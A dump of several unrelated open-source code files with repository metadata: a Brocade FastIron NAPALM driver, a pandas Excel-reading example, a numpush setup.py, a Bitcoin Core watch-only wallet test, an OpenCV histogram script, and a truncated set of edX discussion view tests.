| gpl-3.0 | 4,681,896,428,260,077,000 | 32.971154 | 109 | 0.57062 | false |
gaberger/napalm-brocade-fastiron | napalm_brocade_fastiron/fastiron.py | 1 | 4284 | # Copyright 2017 Brocade Communications. All rights reserved.
#
# The contents of this file are licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""
Napalm driver for Brocade FastIron.
Read https://napalm.readthedocs.io for more information.
"""
from napalm_base.base import NetworkDriver
from napalm_base.exceptions import (
ConnectionException,
SessionLockedException,
MergeConfigException,
ReplaceConfigException,
CommandErrorException,
)
from utils.utils import read_txt_file
from netmiko import ConnectHandler
import textfsm
import socket
class FastIronDriver(NetworkDriver):
"""Napalm driver for FastIron."""
def __init__(self, hostname, username, password, timeout=60, optional_args=None):
"""Constructor."""
self.hostname = hostname
self.username = username
self.password = password
self.timeout = timeout
if optional_args is None:
optional_args = {}
def open(self):
"""Implementation of NAPALM method open."""
self.session = ConnectHandler(device_type = 'brocade_fastiron',
ip = self.hostname,
username = self.username,
password = self.password,
secret = "test",
verbose = True,
use_keys = False,
session_timeout = 300)
self.session.session_preparation()
def close(self):
"""Implementation of NAPALM method close."""
self.session.disconnect()
def send_command(self, command):
"""Wrapper for self.device.send.command().
If command is a list will iterate through commands until valid command.
"""
try:
if isinstance(command, list):
for cmd in command:
output = self.session.send_command(cmd)
# TODO Check exception handling
if "% Invalid" not in output:
break
else:
output = self.session.send_command(command)
return output
except (socket.error, EOFError) as e:
            raise ConnectionException(str(e))
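    # Illustrative call (added comment; the driver variable and command strings
    # are examples only):
    #
    #   output = driver.send_command('show version')
    #   output = driver.send_command(['show version', 'show ver'])
    #
    # When a list is given, the commands are tried in order until one is not
    # rejected with "% Invalid".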
def show_version(self):
output = self.send_command(['show version'])
tplt = read_txt_file("napalm_brocade_fastiron/utils/textfsm_templates/fastiron_show_version.template")
t = textfsm.TextFSM(tplt)
result = t.ParseText(output)
return result
def show_interfaces(self):
output = self.send_command(['show interfaces'])
tplt = read_txt_file("napalm_brocade_fastiron/utils/textfsm_templates/fastiron_show_interfaces.template")
t = textfsm.TextFSM(tplt)
result = t.ParseText(output)
return result
def get_facts(self):
commands = []
commands.append('show version')
try:
result = self.send_command(commands)
print(result)
facts = p.parse_get_facts(result)
except:
raise
return {
'hostname': "-".join((facts['model'], facts['os_version'])),
'fqdn': "-".join((facts['model'], facts['os_version'])),
'vendor': u'Brocade',
'model': facts['model'],
'serial_number': facts['serial_no'],
'os_version': facts['os_version'],
'uptime': facts['uptime'],
# 'interface_list': interfaces,
}
def get_interfaces(self):
pass
| apache-2.0 | 2,448,725,534,546,563,000 | 33.837398 | 113 | 0.568861 | false |
nkmk/python-snippets | notebook/pandas_read_excel.py | 1 | 2434 | import pandas as pd
print(pd.__version__)
# 1.2.2
df = pd.read_excel('data/src/sample.xlsx', index_col=0)
print(df)
# A B C
# one 11 12 13
# two 21 22 23
# three 31 32 33
print(type(df))
# <class 'pandas.core.frame.DataFrame'>
df_sheet_index = pd.read_excel('data/src/sample.xlsx', sheet_name=0, index_col=0)
print(df_sheet_index)
# A B C
# one 11 12 13
# two 21 22 23
# three 31 32 33
df_sheet_name = pd.read_excel('data/src/sample.xlsx', sheet_name='sheet2', index_col=0)
print(df_sheet_name)
# AA BB CC
# ONE 11 12 13
# TWO 21 22 23
# THREE 31 32 33
df_sheet_multi = pd.read_excel('data/src/sample.xlsx', sheet_name=[0, 'sheet2'], index_col=0)
print(type(df_sheet_multi))
# <class 'dict'>
print(len(df_sheet_multi))
# 2
print(df_sheet_multi.keys())
# dict_keys([0, 'sheet2'])
print(df_sheet_multi[0])
# A B C
# one 11 12 13
# two 21 22 23
# three 31 32 33
print(type(df_sheet_multi[0]))
# <class 'pandas.core.frame.DataFrame'>
print(df_sheet_multi['sheet2'])
# AA BB CC
# ONE 11 12 13
# TWO 21 22 23
# THREE 31 32 33
print(type(df_sheet_multi['sheet2']))
# <class 'pandas.core.frame.DataFrame'>
df_sheet_all = pd.read_excel('data/src/sample.xlsx', sheet_name=None, index_col=0)
print(type(df_sheet_all))
# <class 'dict'>
print(df_sheet_all.keys())
# dict_keys(['sheet1', 'sheet2'])
df_header_index = pd.read_excel('data/src/sample.xlsx', header=None, index_col=None)
print(df_header_index)
# 0 1 2 3
# 0 NaN A B C
# 1 one 11 12 13
# 2 two 21 22 23
# 3 three 31 32 33
print(df_header_index.columns)
# Int64Index([0, 1, 2, 3], dtype='int64')
print(df_header_index.index)
# RangeIndex(start=0, stop=4, step=1)
df_default = pd.read_excel('data/src/sample.xlsx')
print(df_default)
# Unnamed: 0 A B C
# 0 one 11 12 13
# 1 two 21 22 23
# 2 three 31 32 33
print(df_default.columns)
# Index(['Unnamed: 0', 'A', 'B', 'C'], dtype='object')
print(df_default.index)
# RangeIndex(start=0, stop=3, step=1)
print(pd.read_excel('data/src/sample.xlsx', index_col=0))
# A B C
# one 11 12 13
# two 21 22 23
# three 31 32 33
df_use_skip = pd.read_excel('data/src/sample.xlsx', index_col=0,
usecols=[0, 1, 3], skiprows=[1], skipfooter=1)
print(df_use_skip)
# A C
# two 21 23
| mit | 1,928,512,420,426,944,000 | 22.862745 | 93 | 0.595316 | false |
sdiehl/numpush | setup.py | 1 | 3346 | import os
import shutil
import numpy as np
from os.path import join as pjoin
from distutils.core import setup, Command
from distutils.extension import Extension
from Cython.Distutils import build_ext
extensions = [
Extension(
"numpush.posix_io.iothread",
["numpush/posix_io/iothread.pyx"],
include_dirs=[],
),
Extension(
"numpush.posix_io.splice",
["numpush/posix_io/splice.pyx"],
include_dirs=[],
),
Extension(
"numpush.posix_io.sendfile",
["numpush/posix_io/sendfile.pyx"],
include_dirs=[],
),
Extension("numpush.moose_store.moose",
["numpush/moose_store/moose.pyx"],
include_dirs=[],
),
Extension(
"numpush.zmq_blosc",
["numpush/zmq_blosc.pyx"],
include_dirs=['include/blosc'],
libraries=['zmq', 'pthread'],
library_dirs=["blosc"],
extra_objects=["include/blosc/blosc.so"],
extra_compile_args=['-msse2'],
),
]
def find_packages():
packages = []
for dir,subdirs,files in os.walk('numpush'):
package = dir.replace(os.path.sep, '.')
if '__init__.py' not in files:
# not a package
continue
packages.append(package)
return packages
# Adapted from the pyzmq setup.py realeased under the BSD.
class CleanCommand(Command):
"""Custom distutils command to clean the .so and .pyc files."""
user_options = [ ]
def initialize_options(self):
self._clean_me = []
self._clean_trees = []
for root, dirs, files in list(os.walk('numpush')):
for f in files:
if os.path.splitext(f)[-1] in ('.pyc', '.so', '.o', '.pyd'):
self._clean_me.append(pjoin(root, f))
for d in dirs:
if d == '__pycache__':
self._clean_trees.append(pjoin(root, d))
for d in ('build',):
if os.path.exists(d):
self._clean_trees.append(d)
def finalize_options(self):
pass
def run(self):
for clean_me in self._clean_me:
try:
os.unlink(clean_me)
except Exception:
pass
for clean_tree in self._clean_trees:
try:
shutil.rmtree(clean_tree)
except Exception:
pass
#-----------------------------------------------------------------------------
# Main setup
#-----------------------------------------------------------------------------
long_desc = \
"""
"""
setup(
name = "numpush",
version = '0.0.1dev',
packages = find_packages(),
ext_modules = extensions,
package_data = {},
author = "Stephen Diehl",
author_email = "[email protected]",
url = 'http://github.com/sdiehl/numpush',
download_url = 'http://github.com/sdiehl/numpush/downloads',
description = "Distributed data/code push for Numpy derivative structures",
long_description = long_desc,
license = "MIT",
cmdclass = {'build_ext': build_ext, 'clean': CleanCommand},
classifiers = [
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: POSIX',
'Topic :: System :: Networking',
'Programming Language :: Python :: 2.7',
]
)
| mit | -6,841,776,423,473,508,000 | 27.598291 | 79 | 0.532576 | false |
cdecker/bitcoin | test/functional/wallet_watchonly.py | 21 | 4426 | #!/usr/bin/env python3
# Copyright (c) 2018-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test createwallet arguments.
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error
)
class CreateWalletWatchonlyTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = False
self.num_nodes = 1
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
node = self.nodes[0]
self.nodes[0].createwallet(wallet_name='default')
def_wallet = node.get_wallet_rpc('default')
a1 = def_wallet.getnewaddress()
wo_change = def_wallet.getnewaddress()
wo_addr = def_wallet.getnewaddress()
self.nodes[0].createwallet(wallet_name='wo', disable_private_keys=True)
wo_wallet = node.get_wallet_rpc('wo')
wo_wallet.importpubkey(pubkey=def_wallet.getaddressinfo(wo_addr)['pubkey'])
wo_wallet.importpubkey(pubkey=def_wallet.getaddressinfo(wo_change)['pubkey'])
# generate some btc for testing
node.generatetoaddress(101, a1)
# send 1 btc to our watch-only address
txid = def_wallet.sendtoaddress(wo_addr, 1)
self.nodes[0].generate(1)
# getbalance
self.log.info('include_watchonly should default to true for watch-only wallets')
self.log.info('Testing getbalance watch-only defaults')
assert_equal(wo_wallet.getbalance(), 1)
assert_equal(len(wo_wallet.listtransactions()), 1)
assert_equal(wo_wallet.getbalance(include_watchonly=False), 0)
self.log.info('Testing listreceivedbyaddress watch-only defaults')
result = wo_wallet.listreceivedbyaddress()
assert_equal(len(result), 1)
assert_equal(result[0]["involvesWatchonly"], True)
result = wo_wallet.listreceivedbyaddress(include_watchonly=False)
assert_equal(len(result), 0)
self.log.info('Testing listreceivedbylabel watch-only defaults')
result = wo_wallet.listreceivedbylabel()
assert_equal(len(result), 1)
assert_equal(result[0]["involvesWatchonly"], True)
result = wo_wallet.listreceivedbylabel(include_watchonly=False)
assert_equal(len(result), 0)
self.log.info('Testing listtransactions watch-only defaults')
result = wo_wallet.listtransactions()
assert_equal(len(result), 1)
assert_equal(result[0]["involvesWatchonly"], True)
result = wo_wallet.listtransactions(include_watchonly=False)
assert_equal(len(result), 0)
self.log.info('Testing listsinceblock watch-only defaults')
result = wo_wallet.listsinceblock()
assert_equal(len(result["transactions"]), 1)
assert_equal(result["transactions"][0]["involvesWatchonly"], True)
result = wo_wallet.listsinceblock(include_watchonly=False)
assert_equal(len(result["transactions"]), 0)
self.log.info('Testing gettransaction watch-only defaults')
result = wo_wallet.gettransaction(txid)
assert_equal(result["details"][0]["involvesWatchonly"], True)
result = wo_wallet.gettransaction(txid=txid, include_watchonly=False)
assert_equal(len(result["details"]), 0)
self.log.info('Testing walletcreatefundedpsbt watch-only defaults')
inputs = []
outputs = [{a1: 0.5}]
options = {'changeAddress': wo_change}
no_wo_options = {'changeAddress': wo_change, 'includeWatching': False}
result = wo_wallet.walletcreatefundedpsbt(inputs=inputs, outputs=outputs, options=options)
assert_equal("psbt" in result, True)
assert_raises_rpc_error(-4, "Insufficient funds", wo_wallet.walletcreatefundedpsbt, inputs, outputs, 0, no_wo_options)
self.log.info('Testing fundrawtransaction watch-only defaults')
rawtx = wo_wallet.createrawtransaction(inputs=inputs, outputs=outputs)
result = wo_wallet.fundrawtransaction(hexstring=rawtx, options=options)
assert_equal("hex" in result, True)
assert_raises_rpc_error(-4, "Insufficient funds", wo_wallet.fundrawtransaction, rawtx, no_wo_options)
if __name__ == '__main__':
CreateWalletWatchonlyTest().main()
| mit | -5,429,415,796,840,428,000 | 40.754717 | 126 | 0.678943 | false |
neilhan/python_cv_learning | 10-back_projection/run_me.py | 1 | 1472 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Testing split image? I don't remember what I was doing this for. """
from __future__ import absolute_import, division, \
print_function, unicode_literals
import sys
import cv2
cv2.namedWindow('WorkAroundTheCoreDump')
cv2.destroyWindow('WorkAroundTheCoreDump')
import numpy as np
import matplotlib.pyplot as plt
import ava.utl
import ava.cv.utl
def getHistogram(image):
    # cv2.calcHist(images, channels, mask, histSize, ranges): list of source
    # images, channel indices, optional mask, number of bins, pixel value range
hist = cv2.calcHist([image], [0], None, [256], [0, 256])
return hist
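# A minimal back-projection sketch (not part of the original script; roi_bgr and
# target_hsv are assumed inputs): build an H-S histogram of a region of interest
# and project it onto an HSV image so that similarly coloured pixels light up.
def backProject(roi_bgr, target_hsv):
    roi_hsv = cv2.cvtColor(roi_bgr, cv2.COLOR_BGR2HSV)
    # 2D hue-saturation histogram of the region of interest
    roi_hist = cv2.calcHist([roi_hsv], [0, 1], None, [180, 256], [0, 180, 0, 256])
    cv2.normalize(roi_hist, roi_hist, 0, 255, cv2.NORM_MINMAX)
    return cv2.calcBackProject([target_hsv], [0, 1], roi_hist, [0, 180, 0, 256], 1)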
@ava.utl.time_this
def main(argv=None):
hsv_map = np.zeros((180, 256, 3), np.uint8)
h, s = np.indices(hsv_map.shape[:2])
hsv_map[:, :, 0] = h
hsv_map[:, :, 1] = s
hsv_map[:, :, 2] = 255
    hsv_map = cv2.cvtColor(hsv_map, cv2.COLOR_HSV2BGR)
    if argv is None:
argv = sys.argv
image1 = cv2.imread("../images/pic3.jpg", 1)
print(type(image1))
print("image.shape:", image1.shape)
print('image:', image1)
print('image dtype:', image1.dtype)
# split image
imageHsv = cv2.cvtColor(image1, cv2.COLOR_BGR2HSV)
hist = cv2.calcHist( [imageHsv], [0, 1], None, [180, 256], [0, 180, 0, 256] )
hist2 = np.clip(hist * 0.005 * 100, 0, 1)
vis = hsv_map * hist2[:, :, np.newaxis] / 255.0
cv2.imshow('image1', image1)
cv2.imshow('hist', vis)
cv2.waitKey()
if __name__ == "__main__":
main()
| bsd-3-clause | 5,574,213,392,175,967,000 | 24.37931 | 81 | 0.617527 | false |
jelugbo/tundex | lms/djangoapps/django_comment_client/base/tests.py | 6 | 41997 | import logging
import json
from django.test.client import Client, RequestFactory
from django.test.utils import override_settings
from django.contrib.auth.models import User
from django.core.management import call_command
from django.core.urlresolvers import reverse
from mock import patch, ANY, Mock
from nose.tools import assert_true, assert_equal # pylint: disable=E0611
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from courseware.tests.modulestore_config import TEST_DATA_MIXED_MODULESTORE
from django_comment_client.base import views
from django_comment_client.tests.group_id import CohortedTopicGroupIdTestMixin, NonCohortedTopicGroupIdTestMixin, GroupIdAssertionMixin
from django_comment_client.tests.utils import CohortedContentTestCase
from django_comment_client.tests.unicode import UnicodeTestMixin
from django_comment_common.models import Role
from django_comment_common.utils import seed_permissions_roles
from student.tests.factories import CourseEnrollmentFactory, UserFactory
from util.testing import UrlResetMixin
from xmodule.modulestore.tests.factories import CourseFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
log = logging.getLogger(__name__)
CS_PREFIX = "http://localhost:4567/api/v1"
class MockRequestSetupMixin(object):
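    # Helpers for faking HTTP responses from the comments service so the views can be exercised without a live backend.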
def _create_response_mock(self, data):
return Mock(text=json.dumps(data), json=Mock(return_value=data))
def _set_mock_request_data(self, mock_request, data):
mock_request.return_value = self._create_response_mock(data)
@patch('lms.lib.comment_client.utils.requests.request')
class CreateThreadGroupIdTestCase(
MockRequestSetupMixin,
CohortedContentTestCase,
CohortedTopicGroupIdTestMixin,
NonCohortedTopicGroupIdTestMixin
):
cs_endpoint = "/threads"
def call_view(self, mock_request, commentable_id, user, group_id, pass_group_id=True):
self._set_mock_request_data(mock_request, {})
mock_request.return_value.status_code = 200
request_data = {"body": "body", "title": "title", "thread_type": "discussion"}
if pass_group_id:
request_data["group_id"] = group_id
request = RequestFactory().post("dummy_url", request_data)
request.user = user
request.view_name = "create_thread"
return views.create_thread(
request,
course_id=self.course.id.to_deprecated_string(),
commentable_id=commentable_id
)
def test_group_info_in_response(self, mock_request):
response = self.call_view(
mock_request,
"cohorted_topic",
self.student,
None
)
self._assert_json_response_contains_group_info(response)
@patch('lms.lib.comment_client.utils.requests.request')
class ThreadActionGroupIdTestCase(
MockRequestSetupMixin,
CohortedContentTestCase,
GroupIdAssertionMixin
):
def call_view(
self,
view_name,
mock_request,
user=None,
post_params=None,
view_args=None
):
self._set_mock_request_data(
mock_request,
{
"user_id": str(self.student.id),
"group_id": self.student_cohort.id,
"closed": False,
"type": "thread"
}
)
mock_request.return_value.status_code = 200
request = RequestFactory().post("dummy_url", post_params or {})
request.user = user or self.student
request.view_name = view_name
return getattr(views, view_name)(
request,
course_id=self.course.id.to_deprecated_string(),
thread_id="dummy",
**(view_args or {})
)
def test_update(self, mock_request):
response = self.call_view(
"update_thread",
mock_request,
post_params={"body": "body", "title": "title"}
)
self._assert_json_response_contains_group_info(response)
def test_delete(self, mock_request):
response = self.call_view("delete_thread", mock_request)
self._assert_json_response_contains_group_info(response)
def test_vote(self, mock_request):
response = self.call_view(
"vote_for_thread",
mock_request,
view_args={"value": "up"}
)
self._assert_json_response_contains_group_info(response)
response = self.call_view("undo_vote_for_thread", mock_request)
self._assert_json_response_contains_group_info(response)
def test_flag(self, mock_request):
response = self.call_view("flag_abuse_for_thread", mock_request)
self._assert_json_response_contains_group_info(response)
response = self.call_view("un_flag_abuse_for_thread", mock_request)
self._assert_json_response_contains_group_info(response)
def test_pin(self, mock_request):
response = self.call_view(
"pin_thread",
mock_request,
user=self.moderator
)
self._assert_json_response_contains_group_info(response)
response = self.call_view(
"un_pin_thread",
mock_request,
user=self.moderator
)
self._assert_json_response_contains_group_info(response)
def test_openclose(self, mock_request):
response = self.call_view(
"openclose_thread",
mock_request,
user=self.moderator
)
self._assert_json_response_contains_group_info(
response,
lambda d: d['content']
)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
@patch('lms.lib.comment_client.utils.requests.request')
class ViewsTestCase(UrlResetMixin, ModuleStoreTestCase, MockRequestSetupMixin):
@patch.dict("django.conf.settings.FEATURES", {"ENABLE_DISCUSSION_SERVICE": True})
def setUp(self):
# Patching the ENABLE_DISCUSSION_SERVICE value affects the contents of urls.py,
# so we need to call super.setUp() which reloads urls.py (because
# of the UrlResetMixin)
super(ViewsTestCase, self).setUp(create_user=False)
# create a course
self.course = CourseFactory.create(
org='MITx', course='999',
discussion_topics={"Some Topic": {"id": "some_topic"}},
display_name='Robot Super Course',
)
self.course_id = self.course.id
# seed the forums permissions and roles
call_command('seed_permissions_roles', self.course_id.to_deprecated_string())
# Patch the comment client user save method so it does not try
# to create a new cc user when creating a django user
with patch('student.models.cc.User.save'):
uname = 'student'
email = '[email protected]'
password = 'test'
# Create the user and make them active so we can log them in.
self.student = User.objects.create_user(uname, email, password)
self.student.is_active = True
self.student.save()
# Enroll the student in the course
CourseEnrollmentFactory(user=self.student,
course_id=self.course_id)
self.client = Client()
assert_true(self.client.login(username='student', password='test'))
def test_create_thread(self, mock_request):
mock_request.return_value.status_code = 200
self._set_mock_request_data(mock_request, {
"thread_type": "discussion",
"title": "Hello",
"body": "this is a post",
"course_id": "MITx/999/Robot_Super_Course",
"anonymous": False,
"anonymous_to_peers": False,
"commentable_id": "i4x-MITx-999-course-Robot_Super_Course",
"created_at": "2013-05-10T18:53:43Z",
"updated_at": "2013-05-10T18:53:43Z",
"at_position_list": [],
"closed": False,
"id": "518d4237b023791dca00000d",
"user_id": "1",
"username": "robot",
"votes": {
"count": 0,
"up_count": 0,
"down_count": 0,
"point": 0
},
"abuse_flaggers": [],
"type": "thread",
"group_id": None,
"pinned": False,
"endorsed": False,
"unread_comments_count": 0,
"read": False,
"comments_count": 0,
})
thread = {
"thread_type": "discussion",
"body": ["this is a post"],
"anonymous_to_peers": ["false"],
"auto_subscribe": ["false"],
"anonymous": ["false"],
"title": ["Hello"],
}
url = reverse('create_thread', kwargs={'commentable_id': 'i4x-MITx-999-course-Robot_Super_Course',
'course_id': self.course_id.to_deprecated_string()})
response = self.client.post(url, data=thread)
assert_true(mock_request.called)
mock_request.assert_called_with(
'post',
'{prefix}/i4x-MITx-999-course-Robot_Super_Course/threads'.format(prefix=CS_PREFIX),
data={
'thread_type': 'discussion',
'body': u'this is a post',
'anonymous_to_peers': False, 'user_id': 1,
'title': u'Hello',
'commentable_id': u'i4x-MITx-999-course-Robot_Super_Course',
'anonymous': False,
'course_id': u'MITx/999/Robot_Super_Course',
},
params={'request_id': ANY},
headers=ANY,
timeout=5
)
assert_equal(response.status_code, 200)
def test_delete_comment(self, mock_request):
self._set_mock_request_data(mock_request, {
"user_id": str(self.student.id),
"closed": False,
})
test_comment_id = "test_comment_id"
request = RequestFactory().post("dummy_url", {"id": test_comment_id})
request.user = self.student
request.view_name = "delete_comment"
response = views.delete_comment(request, course_id=self.course.id.to_deprecated_string(), comment_id=test_comment_id)
self.assertEqual(response.status_code, 200)
self.assertTrue(mock_request.called)
args = mock_request.call_args[0]
self.assertEqual(args[0], "delete")
self.assertTrue(args[1].endswith("/{}".format(test_comment_id)))
def _setup_mock_request(self, mock_request, include_depth=False):
"""
Ensure that mock_request returns the data necessary to make views
function correctly
"""
mock_request.return_value.status_code = 200
data = {
"user_id": str(self.student.id),
"closed": False,
}
if include_depth:
data["depth"] = 0
self._set_mock_request_data(mock_request, data)
def _test_request_error(self, view_name, view_kwargs, data, mock_request):
"""
Submit a request against the given view with the given data and ensure
that the result is a 400 error and that no data was posted using
mock_request
"""
self._setup_mock_request(mock_request, include_depth=(view_name == "create_sub_comment"))
response = self.client.post(reverse(view_name, kwargs=view_kwargs), data=data)
self.assertEqual(response.status_code, 400)
for call in mock_request.call_args_list:
self.assertEqual(call[0][0].lower(), "get")
def test_create_thread_no_title(self, mock_request):
self._test_request_error(
"create_thread",
{"commentable_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"body": "foo"},
mock_request
)
def test_create_thread_empty_title(self, mock_request):
self._test_request_error(
"create_thread",
{"commentable_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"body": "foo", "title": " "},
mock_request
)
def test_create_thread_no_body(self, mock_request):
self._test_request_error(
"create_thread",
{"commentable_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"title": "foo"},
mock_request
)
def test_create_thread_empty_body(self, mock_request):
self._test_request_error(
"create_thread",
{"commentable_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"body": " ", "title": "foo"},
mock_request
)
def test_update_thread_no_title(self, mock_request):
self._test_request_error(
"update_thread",
{"thread_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"body": "foo"},
mock_request
)
def test_update_thread_empty_title(self, mock_request):
self._test_request_error(
"update_thread",
{"thread_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"body": "foo", "title": " "},
mock_request
)
def test_update_thread_no_body(self, mock_request):
self._test_request_error(
"update_thread",
{"thread_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"title": "foo"},
mock_request
)
def test_update_thread_empty_body(self, mock_request):
self._test_request_error(
"update_thread",
{"thread_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"body": " ", "title": "foo"},
mock_request
)
def test_update_thread_course_topic(self, mock_request):
self._setup_mock_request(mock_request)
response = self.client.post(
reverse("update_thread", kwargs={"thread_id": "dummy", "course_id": self.course_id.to_deprecated_string()}),
data={"body": "foo", "title": "foo", "commentable_id": "some_topic"}
)
self.assertEqual(response.status_code, 200)
@patch('django_comment_client.base.views.get_discussion_categories_ids', return_value=["test_commentable"])
def test_update_thread_wrong_commentable_id(self, mock_get_discussion_id_map, mock_request):
self._test_request_error(
"update_thread",
{"thread_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"body": "foo", "title": "foo", "commentable_id": "wrong_commentable"},
mock_request
)
def test_create_comment_no_body(self, mock_request):
self._test_request_error(
"create_comment",
{"thread_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{},
mock_request
)
def test_create_comment_empty_body(self, mock_request):
self._test_request_error(
"create_comment",
{"thread_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"body": " "},
mock_request
)
def test_create_sub_comment_no_body(self, mock_request):
self._test_request_error(
"create_sub_comment",
{"comment_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{},
mock_request
)
def test_create_sub_comment_empty_body(self, mock_request):
self._test_request_error(
"create_sub_comment",
{"comment_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"body": " "},
mock_request
)
def test_update_comment_no_body(self, mock_request):
self._test_request_error(
"update_comment",
{"comment_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{},
mock_request
)
def test_update_comment_empty_body(self, mock_request):
self._test_request_error(
"update_comment",
{"comment_id": "dummy", "course_id": self.course_id.to_deprecated_string()},
{"body": " "},
mock_request
)
def test_update_comment_basic(self, mock_request):
self._setup_mock_request(mock_request)
comment_id = "test_comment_id"
updated_body = "updated body"
response = self.client.post(
reverse(
"update_comment",
kwargs={"course_id": self.course_id.to_deprecated_string(), "comment_id": comment_id}
),
data={"body": updated_body}
)
self.assertEqual(response.status_code, 200)
mock_request.assert_called_with(
"put",
"{prefix}/comments/{comment_id}".format(prefix=CS_PREFIX, comment_id=comment_id),
headers=ANY,
params=ANY,
timeout=ANY,
data={"body": updated_body}
)
def test_flag_thread_open(self, mock_request):
self.flag_thread(mock_request, False)
def test_flag_thread_close(self, mock_request):
self.flag_thread(mock_request, True)
def flag_thread(self, mock_request, is_closed):
mock_request.return_value.status_code = 200
self._set_mock_request_data(mock_request, {
"title": "Hello",
"body": "this is a post",
"course_id": "MITx/999/Robot_Super_Course",
"anonymous": False,
"anonymous_to_peers": False,
"commentable_id": "i4x-MITx-999-course-Robot_Super_Course",
"created_at": "2013-05-10T18:53:43Z",
"updated_at": "2013-05-10T18:53:43Z",
"at_position_list": [],
"closed": is_closed,
"id": "518d4237b023791dca00000d",
"user_id": "1", "username": "robot",
"votes": {
"count": 0,
"up_count": 0,
"down_count": 0,
"point": 0
},
"abuse_flaggers": [1],
"type": "thread",
"group_id": None,
"pinned": False,
"endorsed": False,
"unread_comments_count": 0,
"read": False,
"comments_count": 0,
})
url = reverse('flag_abuse_for_thread', kwargs={'thread_id': '518d4237b023791dca00000d', 'course_id': self.course_id.to_deprecated_string()})
response = self.client.post(url)
assert_true(mock_request.called)
call_list = [
(
('get', '{prefix}/threads/518d4237b023791dca00000d'.format(prefix=CS_PREFIX)),
{
'data': None,
'params': {'mark_as_read': True, 'request_id': ANY},
'headers': ANY,
'timeout': 5
}
),
(
('put', '{prefix}/threads/518d4237b023791dca00000d/abuse_flag'.format(prefix=CS_PREFIX)),
{
'data': {'user_id': '1'},
'params': {'request_id': ANY},
'headers': ANY,
'timeout': 5
}
),
(
('get', '{prefix}/threads/518d4237b023791dca00000d'.format(prefix=CS_PREFIX)),
{
'data': None,
'params': {'mark_as_read': True, 'request_id': ANY},
'headers': ANY,
'timeout': 5
}
)
]
assert_equal(call_list, mock_request.call_args_list)
assert_equal(response.status_code, 200)
def test_un_flag_thread_open(self, mock_request):
self.un_flag_thread(mock_request, False)
def test_un_flag_thread_close(self, mock_request):
self.un_flag_thread(mock_request, True)
def un_flag_thread(self, mock_request, is_closed):
mock_request.return_value.status_code = 200
self._set_mock_request_data(mock_request, {
"title": "Hello",
"body": "this is a post",
"course_id": "MITx/999/Robot_Super_Course",
"anonymous": False,
"anonymous_to_peers": False,
"commentable_id": "i4x-MITx-999-course-Robot_Super_Course",
"created_at": "2013-05-10T18:53:43Z",
"updated_at": "2013-05-10T18:53:43Z",
"at_position_list": [],
"closed": is_closed,
"id": "518d4237b023791dca00000d",
"user_id": "1",
"username": "robot",
"votes": {
"count": 0,
"up_count": 0,
"down_count": 0,
"point": 0
},
"abuse_flaggers": [],
"type": "thread",
"group_id": None,
"pinned": False,
"endorsed": False,
"unread_comments_count": 0,
"read": False,
"comments_count": 0
})
url = reverse('un_flag_abuse_for_thread', kwargs={'thread_id': '518d4237b023791dca00000d', 'course_id': self.course_id.to_deprecated_string()})
response = self.client.post(url)
assert_true(mock_request.called)
call_list = [
(
('get', '{prefix}/threads/518d4237b023791dca00000d'.format(prefix=CS_PREFIX)),
{
'data': None,
'params': {'mark_as_read': True, 'request_id': ANY},
'headers': ANY,
'timeout': 5
}
),
(
('put', '{prefix}/threads/518d4237b023791dca00000d/abuse_unflag'.format(prefix=CS_PREFIX)),
{
'data': {'user_id': '1'},
'params': {'request_id': ANY},
'headers': ANY,
'timeout': 5
}
),
(
('get', '{prefix}/threads/518d4237b023791dca00000d'.format(prefix=CS_PREFIX)),
{
'data': None,
'params': {'mark_as_read': True, 'request_id': ANY},
'headers': ANY,
'timeout': 5
}
)
]
assert_equal(call_list, mock_request.call_args_list)
assert_equal(response.status_code, 200)
def test_flag_comment_open(self, mock_request):
self.flag_comment(mock_request, False)
def test_flag_comment_close(self, mock_request):
self.flag_comment(mock_request, True)
def flag_comment(self, mock_request, is_closed):
mock_request.return_value.status_code = 200
self._set_mock_request_data(mock_request, {
"body": "this is a comment",
"course_id": "MITx/999/Robot_Super_Course",
"anonymous": False,
"anonymous_to_peers": False,
"commentable_id": "i4x-MITx-999-course-Robot_Super_Course",
"created_at": "2013-05-10T18:53:43Z",
"updated_at": "2013-05-10T18:53:43Z",
"at_position_list": [],
"closed": is_closed,
"id": "518d4237b023791dca00000d",
"user_id": "1",
"username": "robot",
"votes": {
"count": 0,
"up_count": 0,
"down_count": 0,
"point": 0
},
"abuse_flaggers": [1],
"type": "comment",
"endorsed": False
})
url = reverse('flag_abuse_for_comment', kwargs={'comment_id': '518d4237b023791dca00000d', 'course_id': self.course_id.to_deprecated_string()})
response = self.client.post(url)
assert_true(mock_request.called)
call_list = [
(
('get', '{prefix}/comments/518d4237b023791dca00000d'.format(prefix=CS_PREFIX)),
{
'data': None,
'params': {'request_id': ANY},
